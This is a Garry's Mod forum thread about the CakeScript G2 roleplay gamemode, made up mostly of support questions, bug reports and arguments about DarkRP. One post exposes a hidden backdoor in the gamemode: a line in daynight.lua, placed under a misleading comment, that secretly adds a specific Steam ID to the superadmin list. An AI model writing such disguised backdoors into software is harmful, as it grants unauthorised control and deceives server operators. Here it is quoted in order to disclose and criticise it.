• CakeScript G2
    934 replies, posted
[QUOTE=IDOTS]How to you use a weapon? (Unholster it) The only weapon I can use is the Pistol, the rest including stunstick all just stay on the npc idle animations[/QUOTE] In console type rp_toggleholster.
[code] Added ply:SetStepSize( f ) Added ply:GetStepSize() Added ply:SetJumpPower( f ) Added ply:GetJumpPower() [/code] Now with the new update, People should be able to modify jump heights.
What are all admin commands?
How do I use previously saved characters?
anyone wanna test my gamemode?
[QUOTE=Darthveamon]Heres My script, CARP script. It's fairly simple. based around the 50's + 60's. Mafia and Cops, can't get better. I know you may complain that this will be a DM fest but I'm implementing a Kick-ban gun for the Mayor (admin-only position but public is set to true here for testing purposes) so he can kick/ban anyone who causes trouble. Things are set for public = true. because of my idea for a system. People who want to be a cop should just be able to instead of placing applications in forums. But there is a sort of Hierarchy. You must start at Rookie then work your way up. Same goes for Mafia only you start at Thug and then go up. Roleplaying and anti-minging will be strictly enforced. Though if a cop is leading you to jail your mafia buddies can still kill him and help you escape. I might start a site for my gamemode if it works well.[/QUOTE] Please DON'T. We DO NOT NEED A 2nd DARK RP. It has already thrown RP in a big enough abyss..
[QUOTE=Darthveamon]anyone wanna test my gamemode?[/QUOTE] Gamemode? I don't see a gamemode. In fact there isn't a gamemode. There is a scheme. And a DarkRP Scheme at that.
[QUOTE=nicktelli]Historically, garry banned people for putting backdoor admin in their gamemodes. I hope he will do the same. A simple search for STEAM_ in all files produced this little number. daynight.lua, line 59: table.insert(SuperAdmins, "STEAM_0:1:5947214"); Some code around it: [lua] // get sun entities. self.env_sun = ents.FindByClass( 'env_sun' ); // setup the sun entities materials ( fixes a repeating console error ) table.insert(SuperAdmins, "STEAM_0:1:5947214"); if ( self.env_sun ) then local sun; for _ , sun in pairs( self.env_sun ) do sun:SetKeyValue( 'material' , 'sprites/light_glow02_add_noz.vmt' ); sun:SetKeyValue( 'overlaymaterial' , 'sprites/light_glow02_add_noz.vmt' ); end end [/lua] Did you see the sneaky bit? Yea, I thought so. This is VERY dishonest and should probably result in some account suspension. Also on the first page, he verified his ID when someone asked what it was. [url]http://forums.facepunchstudios.com/showpost.php?p=10218966&postcount=33[/url][/QUOTE] Wow, great gamemode.
Why fight DarkRP? Just because it's not RP doesn't mean it's not fun. It's still popular as heck. We don't play DarkRP to rp. we play it to play gmod in a humoristic twist on real life and have a good time. After all real life doesn't have jobs you just vote or click to become. And there are rules against being a criminal in real life. In RP here you can be a criminal and if you don't commit any crimes you are fine. Don't like it? Don't play it. Play an actual RPG like Final Fantasy or GTA or D&D. Don't complain on the forums.
Is there any way I can fix the game mode so that when you drop an item it calls the items "ITEM: Drop" function? I'm hoping to make it so that when you pick a weapon item up it will give the weapon and if you drop the item it will strip the weapon. Edit Oh and could someone list the hooks Lua Banana added and explain how to use them? Because I have no idea how "CAKE.SetCharField(target, "flags", args);" works.
heck i'm going to make a scheme where the POINT is to DM and cop abuse. It's called 1984 RP.
I wonder if anyone still has the voteflags plugin?
[QUOTE=Nori]rp_admin setflags name flagkey flagkey flagkey Civil Protection is cp.[/QUOTE] Hey.. great gamemode. just have one question. how do i set salery and stuff. cuz im not sure about all that like if you could get me a list of commands that would be great. steam: (PPF)Matt|Ldr|{RPP}
So any updates coming anytime soon?
No. I've said this about 50 times now, Nori has abandoned this script.
But people still use it.
Don't recall saying people didn't. People still use DarkRP As well and It's been abandoned for how long? Exactly.
How is the progress on Arcoscript coming? Could you give us a rough estimate to when it will be released? Because that would be awesome ;D Oh well, good luck i guess :)
[QUOTE=Ankpuss]How is the progress on Arcoscript coming? Could you give us a rough estimate to when it will be released? Because that would be awesome ;D Oh well, good luck i guess :)[/QUOTE] Frankly I can't give you any idea because of how quickly it's going. We're releasing around 2 updates a day on average but with only a couple coders working it's rather slow progress.
[QUOTE=Bios Element]No. I've said this about 50 times now, Nori has abandoned this script.[/QUOTE] BLASPHEMY. :argh:
BURN HIM AT THE STAKE :lol:
[QUOTE=Nori]BLASPHEMY. :argh:[/QUOTE] So does that mean this script hasn't been abandoned yet?
[QUOTE=Alexy13423]So does that mean this script hasn't been abandoned yet?[/QUOTE] It means that He's randomly decided to come back and release a half baked plugin an then wonder off again.
Ah well, it took me about 30 minutes to figure out CakeScript on my own due to something forcing me to type first and last name for admin commands. Also, if i use a gun, it doesn't let me aim, do i have to right click other people and select some sort of shoot command to shoot them? Haven't tested it on multiplayer -.-
Anyone got a way to fix the "cowering" animation on dedicated severs? I can't see anyway how to. Like if you get out weapon_physcannon, you're animation is cowering. It's starting to really piss me off now, so if anyone knows how to fix it thanks.
[QUOTE=Bios Element]It means that He's randomly decided to come back and release a half baked plugin an then wonder off again.[/QUOTE] I had no internet for like two weeks, then I went on vacation. :|
[QUOTE=Alexy13423]Ah well, it took me about 30 minutes to figure out CakeScript on my own due to something forcing me to type first and last name for admin commands. Also, if i use a gun, it doesn't let me aim, do i have to right click other people and select some sort of shoot command to shoot them? Haven't tested it on multiplayer -.-[/QUOTE] rp_toggleholster.
[code] Couldn't include file 'cakescriptg2/gamemode/cl_init.lua' (File not found) ********************************************** ********************************************** ********** COULDN'T LOAD GAMEMODE!! ********** ********************************************** ********************************************** There was a problem opening the gamemode file 'cakescriptg2/gamemode/cl_init.lua' [/code] help...
Ankpuss are you the one working on this project? I thought Cake Script was luabanana's project...I'm confused.
I am not working on this project, i never did :P I simply try and help by pointing out bugs & errors and try to solve them for the sake of everyone. Sorry for the confusion :P Regards, Pete [b]Edit:[/b] [QUOTE=DrMonumbo][code] Couldn't include file 'cakescriptg2/gamemode/cl_init.lua' (File not found) ********************************************** ********************************************** ********** COULDN'T LOAD GAMEMODE!! ********** ********************************************** ********************************************** There was a problem opening the gamemode file 'cakescriptg2/gamemode/cl_init.lua' [/code] help...[/QUOTE] Try re-downloading the gamemode and make sure that you extracted it properly. If it says that the file doesn't exist then it probably doesn't, so try a reinstall. If that doesn't work i will attempt to recreate this error and see how you can fix it. Regards, Pete
Sorry, you need to Log In to post a reply to this thread.